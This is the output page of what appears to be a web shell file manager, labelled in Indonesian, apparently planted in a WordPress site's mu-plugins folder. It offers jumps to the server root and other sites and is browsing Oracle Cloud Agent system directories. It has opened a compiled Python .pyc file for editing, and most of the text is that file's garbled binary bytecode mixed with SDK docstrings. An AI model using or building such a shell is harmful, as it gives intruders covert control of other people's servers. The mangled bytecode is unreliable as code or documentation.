📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
apigateway
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/apigateway/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: response_cache_lookup_policy.pyc
a N��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdd� Zedd� �Zedd� �Z e j d d� �Z ed d� �Zej dd� �Zed d� �Zej dd� �Zdd� Z dd� Zdd� ZdS )�ResponseCacheLookupPolicyz0 Base policy for Response Cache lookup. �SIMPLE_LOOKUP_POLICYc K s2 dddd�| _ dddd�| _d| _d| _d| _dS )ak Initializes a new ResponseCacheLookupPolicy object with values from keyword arguments. This class has the following subclasses and if you are using this class as input to a service operations then you should favor using a subclass over the base class: * :class:`~oci.apigateway.models.SimpleLookupPolicy` The following keyword arguments are supported (corresponding to the getters/setters of this class): :param type: The value to assign to the type property of this ResponseCacheLookupPolicy. Allowed values for this property are: "SIMPLE_LOOKUP_POLICY", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type type: str :param is_enabled: The value to assign to the is_enabled property of this ResponseCacheLookupPolicy. :type is_enabled: bool :param is_private_caching_enabled: The value to assign to the is_private_caching_enabled property of this ResponseCacheLookupPolicy. :type is_private_caching_enabled: bool �str�bool)�type� is_enabled�is_private_caching_enabledr � isEnabled�isPrivateCachingEnabledN)� swagger_types� attribute_map�_type�_is_enabled�_is_private_caching_enabled)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/apigateway/models/response_cache_lookup_policy.py�__init__ s ��z"ResponseCacheLookupPolicy.__init__c C s | d }|dkrdS dS dS )z� Given the hash representation of a subtype of this class, use the info in the hash to return the class of the subtype. r r �SimpleLookupPolicyr Nr )�object_dictionaryr r r r �get_subtype<